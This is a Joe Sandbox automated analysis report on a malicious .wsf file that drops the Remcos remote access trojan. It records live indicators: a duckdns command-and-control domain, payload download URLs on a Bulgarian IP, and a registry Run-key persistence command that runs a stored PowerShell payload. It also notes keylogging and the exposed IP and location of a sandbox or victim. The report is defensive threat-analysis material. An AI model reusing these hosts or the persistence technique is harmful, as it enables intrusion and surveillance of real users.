              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5776, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

              Remote Access Functionality

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0000000A.00000002.4590474258.000000000312C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 5776, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information22
              Scripting              		Valid Accounts1
              Windows Management Instrumentation              		22
              Scripting              		1
              DLL Side-Loading              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              File and Directory Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution              		1
              DLL Side-Loading              		112
              Process Injection              		1
              Software Packing              		LSASS Memory13
              System Information Discovery              		Remote Desktop Protocol11
              Input Capture              		1
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts11
              Command and Scripting Interpreter              		1
              Registry Run Keys / Startup Folder              		1
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		Security Account Manager11
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login HookLogin Hook1
              Masquerading              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Modify Registry              		LSA Secrets41
              Virtualization/Sandbox Evasion              		SSHKeylogging212
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
              Virtualization/Sandbox Evasion              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items112
              Process Injection              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1429076 Sample: rOferta_SKGNMECLemnedefinit... Startdate: 20/04/2024 Architecture: WINDOWS Score: 100 40 jgbours284hawara01.duckdns.org 2->40 42 geoplugin.net 2->42 54 Snort IDS alert for network traffic 2->54 56 Multi AV Scanner detection for domain / URL 2->56 58 Found malware configuration 2->58 62 7 other signatures 2->62 11 wscript.exe 1 2->11         started        signatures3 60 Uses dynamic DNS services 40->60 process4 signatures5 64 VBScript performs obfuscated calls to suspicious functions 11->64 66 Suspicious powershell command line found 11->66 68 Wscript starts Powershell (via cmd or directly) 11->68 70 3 other signatures 11->70 14 powershell.exe 14 19 11->14         started        process6 dnsIp7 48 87.121.105.163, 49710, 49718, 80 NET1-ASBG Bulgaria 14->48 74 Suspicious powershell command line found 14->74 76 Very long command line found 14->76 78 Found suspicious powershell code related to unpacking or dynamic code loading 14->78 18 powershell.exe 17 14->18         started        21 conhost.exe 14->21         started        23 cmd.exe 1 14->23         started        signatures8 process9 signatures10 50 Writes to foreign memory regions 18->50 52 Found suspicious powershell code related to unpacking or dynamic code loading 18->52 25 wab.exe 5 15 18->25         started        30 cmd.exe 1 18->30         started        process11 dnsIp12 44 jgbours284hawara01.duckdns.org 45.88.90.110, 3050, 49720 LVLT-10753US Bulgaria 25->44 46 geoplugin.net 178.237.33.50, 49721, 80 ATOM86-ASATOM86NL Netherlands 25->46 38 C:\Users\user\AppData\Roaming\mvourhjs.dat, data 25->38 dropped 72 Installs a global keyboard hook 25->72 32 cmd.exe 1 25->32         started        file13 signatures14 process15 process16 34 conhost.exe 32->34         started        36 reg.exe 1 1 32->36         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              rOferta_SKGNMECLemnedefinitionen353523577.wsf12%VirustotalBrowse
              rOferta_SKGNMECLemnedefinitionen353523577.wsf8%ReversingLabsWin32.Trojan.Generic

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              jgbours284hawara01.duckdns.org7%VirustotalBrowse
              geoplugin.net4%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              http://geoplugin.net/json.gp100%URL Reputationphishing
              https://contoso.com/0%URL Reputationsafe
              jgbours284hawara01.duckdns.org7%VirustotalBrowse
              http://87.121.105.16317%VirustotalBrowse
              http://geoplugin.net/json.gpw0%VirustotalBrowse
              http://87.121.105.163/Belyves242.hhk15%VirustotalBrowse
              http://geoplugin.net/4%VirustotalBrowse
              http://geoplugin.net/json.gpg0%VirustotalBrowse

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              jgbours284hawara01.duckdns.org
              		45.88.90.110
              		truetrueunknown
              geoplugin.net
              		178.237.33.50
              		truefalseunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              jgbours284hawara01.duckdns.orgtrueunknown
              http://87.121.105.163/Belyves242.hhkfalseunknown
              http://geoplugin.net/json.gptrue
              • URL Reputation: phishing
              		unknown
              http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binfalse
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://geoplugin.net/json.gpgwab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://87.121.105.163/Belyves242.hhkXRpowershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      https://go.micropowershell.exe, 00000002.00000002.2558490378.0000023D5B4AD000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binPPvwab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://87.121.105.163powershell.exe, 00000002.00000002.2558490378.0000023D5BBC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2558490378.0000023D5A4C6000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binmwab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.binFokusGulduelvalenza.it/DtExZZndAxdvvlCKCcIVF127.biwab.exe, 0000000A.00000002.4619411205.0000000022580000.00000004.00001000.00020000.00000000.sdmpfalse
                            		unknown
                            http://geoplugin.net/json.gpwwab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                            https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.2481243191.0000000004A77000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://geoplugin.net/wab.exe, 0000000A.00000002.4590474258.00000000030F3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                              https://aka.ms/pscore6lBpowershell.exe, 00000005.00000002.2481243191.0000000004921000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2646471533.0000023D6A311000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005989000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2484190687.0000000005AC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://87.121.105.163/DtExZZndAxdvvlCKCcIVF127.biniwab.exe, 0000000A.00000002.4590474258.0000000003116000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://87.121.105.163/Belyves242.hhkPpowershell.exe, 00000002.00000002.2558490378.0000023D5A4C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.2558490378.0000023D5A2A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2558490378.0000023D5A2A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2481243191.0000000004921000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://87.121.Hpowershell.exe, 00000002.00000002.2558490378.0000023D5BF19000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            87.121.105.163
                                            		unknownBulgaria
                                            		43561NET1-ASBGfalse
                                            178.237.33.50
                                            		geoplugin.netNetherlands
                                            		8455ATOM86-ASATOM86NLfalse
                                            45.88.90.110
                                            		jgbours284hawara01.duckdns.orgBulgaria
                                            		10753LVLT-10753UStrue

                                            General Information

                                            Joe Sandbox version:40.0.0 Tourmaline
                                            Analysis ID:1429076
                                            Start date and time:2024-04-20 16:04:10 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 9m 35s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:15
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:rOferta_SKGNMECLemnedefinitionen353523577.wsf
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.expl.evad.winWSF@17/9@2/3
                                            EGA Information:Failed
                                            HCA Information:
                                            • Successful, ratio: 75%
                                            • Number of executed functions: 45
                                            • Number of non-executed functions: 3
                                            Cookbook Comments:
                                            • Found application associated with file extension: .wsf
                                            • Override analysis time to 240000 for current running targets taking high CPU consumption

                                            Warnings

                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 1492 because it is empty
                                            • Execution Graph export aborted for target powershell.exe, PID 6256 because it is empty
                                            • Execution Graph export aborted for target wab.exe, PID 5776 because there are no executed function
                                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            16:05:04API Interceptor129x Sleep call for process: powershell.exe modified
                                            16:05:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run nyerhvervelsen %Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)
                                            16:05:46AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run nyerhvervelsen %Impopular% -w 1 $monotonicity=(Get-ItemProperty -Path 'HKCU:\Weariest\').Amperian;%Impopular% ($monotonicity)
                                            16:06:11API Interceptor6089821x Sleep call for process: wab.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            87.121.105.163Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 87.121.105.163/icjFpYDkBweqyeZ252.bin
                                            PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 87.121.105.163/sssSAXCCU156.bin
                                            PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 87.121.105.163/vhhJQWfiJN142.bin
                                            EFEMACPedido0180040240418.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 87.121.105.163/YSnpkrCwWalJFSpN146.bin
                                            Carlispa_Ordine_00401702400417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 87.121.105.163/LvtPvRTpeEEAKbCbj78.bin
                                            EqcaSLpedido001417.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 87.121.105.163/LbfIzIKE234.bin
                                            PonudaSKMTBH365756867868855766786686.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 87.121.105.163/OtuqqTMXENmnDwNvoaXlTAT192.bin
                                            178.237.33.50SecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • geoplugin.net/json.gp
                                            z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • geoplugin.net/json.gp
                                            SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • geoplugin.net/json.gp
                                            UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • geoplugin.net/json.gp
                                            Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                            • geoplugin.net/json.gp
                                            AWB DOCUMENT.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • geoplugin.net/json.gp
                                            XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • geoplugin.net/json.gp
                                            2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • geoplugin.net/json.gp
                                            dhl_doc_awb_shipping_invoice_18_04_2024_000000000000024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • geoplugin.net/json.gp

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            jgbours284hawara01.duckdns.orgPonudaSKMTBH365756867868855766786686.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 45.88.90.110
                                            geoplugin.netSecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • 178.237.33.50
                                            z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • 178.237.33.50
                                            SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • 178.237.33.50
                                            Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            AWB DOCUMENT.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 178.237.33.50
                                            https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5Get hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            NET1-ASBGxnNcI6OenKJs.exeGet hashmaliciousQuasarBrowse
                                            • 94.156.79.26
                                            Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                            • 87.121.105.163
                                            AWB DOCUMENT.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 87.121.105.184
                                            85x5rW00VC.elfGet hashmaliciousGafgytBrowse
                                            • 93.123.85.170
                                            xSvRIB2B2i.elfGet hashmaliciousGafgytBrowse
                                            • 93.123.85.170
                                            HnDIabQLxo.elfGet hashmaliciousGafgytBrowse
                                            • 93.123.85.170
                                            P6VjwulCEv.elfGet hashmaliciousGafgytBrowse
                                            • 93.123.85.170
                                            S7AqbuIfHT.elfGet hashmaliciousGafgytBrowse
                                            • 93.123.85.170
                                            higf1frmKz.elfGet hashmaliciousGafgytBrowse
                                            • 93.123.85.170
                                            MR6rclGNGX.elfGet hashmaliciousGafgytBrowse
                                            • 93.123.85.170
                                            LVLT-10753USOA32chYJ8O.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 45.88.90.160
                                            6aG1a8blIn.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 45.88.90.160
                                            Y3hoUa55dT.exeGet hashmaliciousSocks5SystemzBrowse
                                            • 45.88.90.160
                                            PonudaSKMTBH365756867868855766786686.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 45.88.90.110
                                            77system.vbsGet hashmaliciousXmrigBrowse
                                            • 45.88.90.68
                                            https://mail.45-88-90-139.cprapid.com/Get hashmaliciousPayPal PhisherBrowse
                                            • 45.88.90.139
                                            https://p1.45-88-90-139.cprapid.com/Get hashmaliciousPayPal PhisherBrowse
                                            • 45.88.90.139
                                            https://p6.45-88-90-139.cprapid.com/Get hashmaliciousPayPal PhisherBrowse
                                            • 45.88.90.139
                                            Ns1xkTsDQO.elfGet hashmaliciousMiraiBrowse
                                            • 168.215.26.33
                                            https://mail.accedi.45-88-90-150.cprapid.com/Get hashmaliciousPayPal PhisherBrowse
                                            • 45.88.90.150
                                            ATOM86-ASATOM86NLSecuriteInfo.com.Exploit.ShellCode.69.14498.22623.rtfGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • 178.237.33.50
                                            z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • 178.237.33.50
                                            SecuriteInfo.com.Trojan.Siggen28.27399.23329.29047.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            UMMAN #U0130HRACAT AFR5641 910-1714 1633.exeGet hashmaliciousGuLoader, RemcosBrowse
                                            • 178.237.33.50
                                            Invoice No. 03182024.docxGet hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            AWB DOCUMENT.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                            • 178.237.33.50
                                            https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:24e81d17-b801-4fad-ae25-120d655923c5Get hashmaliciousRemcosBrowse
                                            • 178.237.33.50
                                            XY2I8rWLkM.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50
                                            2020.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                            • 178.237.33.50

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

                                            Download File
                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                            File Type:JSON data
                                            Category:dropped
                                            Size (bytes):963
                                            Entropy (8bit):4.995620093649274
                                            Encrypted:false
                                            SSDEEP:12:tklzTknd6CsGkMyGWKyGXPVGArwY3+8aIHrGIArpv/mOAaNO+ao9W7iN5zzkw7Rr:qlkdRNuKyGX855vXhNlT3/77Kdxtro
                                            MD5:334018F02CE31BCBB4864D602B557FE5
                                            SHA1:C6DE43E8D6B5C026C0B0A56A898A3F00B282B881
                                            SHA-256:F70CE925C3923E25A5ADB7089E7EE752E771FBD073888ABFC426138C9094F1B3
                                            SHA-512:31EF486A2F75226594BC553CBAFA84B645B6ED456F35F363C8EFD6229F4A731981CA1B7736CD4BD739DDCA885F068E96692BB16C7A906314B52220DC63E318BB
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:{. "geoplugin_request":"81.181.57.52",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Marietta",. "geoplugin_region":"Georgia",. "geoplugin_regionCode":"GA",. "geoplugin_regionName":"Georgia",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"524",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"34.0414",. "geoplugin_longitude":"-84.5053",. "geoplugin_locationAccuracyRadius":"1000",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:modified
                                            Size (bytes):11608
                                            Entropy (8bit):4.886255615007755
                                            Encrypted:false
                                            SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                            MD5:C7F7A26360E678A83AFAB85054B538EA
                                            SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                            SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                            SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:Nlllulbnolz:NllUc
                                            MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                            SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                            SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                            SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                            Malicious:false
                                            Preview:@...e................................................@..........

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55dvwptc.llq.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
